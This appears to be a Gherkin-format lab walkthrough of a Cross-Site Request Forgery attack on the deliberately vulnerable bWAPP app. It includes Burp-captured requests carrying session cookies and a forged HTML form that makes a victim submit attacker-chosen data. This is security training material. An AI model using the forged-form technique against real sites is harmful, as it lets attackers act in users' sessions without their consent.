# language: en

Feature: Cross-Site Request Forgery
  From system bWAPP
  From the A8 - Cross-Site Request Forgery
  With Low security level
  Background:
    Given I am running Debian Stretch GNU/Linux kernel 4.9.0-6-amd64
    And I am using Firefox 52.7.3 (64-bit)
    And I am running Burp Suite Community edition v1.7.30
    Given the following in the url
      """
      URL: http://localhost/bWAPP/htmli_get.php
      Message: HTML injection - Reflected (GET)
      Details:
      - Input Firstname/Lastname
      - Submit Button
      Objective: Make a CSRF
      """

  Scenario: Cross-Site Request Forgery
    Any application that allows a user to send or
    update data is a potential target for CSRF.
    Given the site
    Then I inspect it by using Burp, just to be sure of the params sent
      """
      # Burp Request on htmli_get.php
      GET /bWAPP/htmli_get.php?firstname=&lastname=&form=submit HTTP/1.1
      Host: 192.168.56.101
      User-Agent: Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Referer: http://192.168.56.101/bWAPP/htmli_get.php?firstname=&lastname=\
      &form=submit
      Cookie: security_level=0; SESScb1b7e2ce310cad2d8cf9c0927abc1d2=\
      UNQxO4hyF2YrPZmo8Bf0w4Kq7qR7meVpC91gbXGD9dI; \
      PHPSESSID=ae744b435c457bc383e1133fb2264b4d
      Connection: close
      Upgrade-Insecure-Requests: 1
      """
    And I craft a fake html input form
      """
      # csrf-test.html
      <html>
      <form enctype="application/x-www-form-urlencoded" method="GET" \
      action="http://192.168.56.101/bWAPP/htmli_get.php">
        <table>
          <tr>
            <td>firstname</td>
            <td><input type="text" value="" name="firstname"></td>
          </tr>
          <tr>
            <td>lastname</td>
            <td><input type="text" value="" name="lastname"></td>
          </tr>
        </table>
        <button type="submit" value="http://192.168.56.101/bWAPP/htmli_get.php"
        name="form">Submit</form>
      </html>
      """
    Then supposing I trick the user in to going to that fake html form
    When the user enters
    And inputs it's data, the request will be sent with it's cookies
      """
      # Burp Request on csrf-test.html
      GET /bWAPP/htmli_get.php?firstname=fake&lastname=data&form=\
      http%3A%2F%2F192.168.56.101%2FbWAPP%2Fhtmli_get.php HTTP/1.1
      Host: 192.168.56.101
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Cookie: security_level=0; \
      SESScb1b7e2ce310cad2d8cf9c0927abc1d2=\
      UNQxO4hyF2YrPZmo8Bf0w4Kq7qR7meVpC91gbXGD9dI; \
      PHPSESSID=ae744b435c457bc383e1133fb2264b4d
      Connection: close
      Upgrade-Insecure-Requests: 1

      # Note: the request, made on the csrf-test.html had the
      # cookies of the user
      """
    Then the user has been tricked into submitting my data
